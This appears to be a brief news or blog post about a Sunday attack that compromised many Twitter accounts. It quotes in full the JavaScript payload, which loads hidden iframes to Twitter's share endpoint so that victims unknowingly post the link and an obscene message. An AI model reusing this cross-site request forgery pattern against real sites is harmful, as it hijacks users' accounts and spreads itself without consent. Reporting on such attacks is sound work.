On Sunday afternoon, a large number of Twitter accounts were compromised by users who inadvertently were lured into viewing the following URL,
var el1 = document.createElement('iframe'); var el2 = document.createElement('iframe'); el1.style.visibility="hidden"; el2.style.visibility="hidden"; el1.src = "http://twitter.com/share/update?status=WTF:%20" + window.location; el2.src = "http://twitter.com/share/update?status=i%20love%20anal%20sex%20with%20goats"; document.getElementsByTagName("body").appendChild(el1); document.getElementsByTagName("body").appendChild(el2);
Some of the most prominent Twitter posters with very large follower lists, such as @zee, web cartoonist @oatmeal and Tech Blogger Robert Scoble, @scobleizer have been affected, along with hundreds of thousands of their followers which also clicked on the malicious links.
I haven't been able to determine if any Mac or iOS or Android users have been compromised by this exploit yet, so please provide me with an update if you use Safari or another Mac browser or alternative OS and you've been hit.
UPDATE: At 1:49PM, EDT on Sunday, Twitter, on its status blog has notified users that the compromise has been blocked on the new and old versions of the Twitter Web UI and they are removing all the Tweets which have been sent with the cross-site compromise link and the offensive message.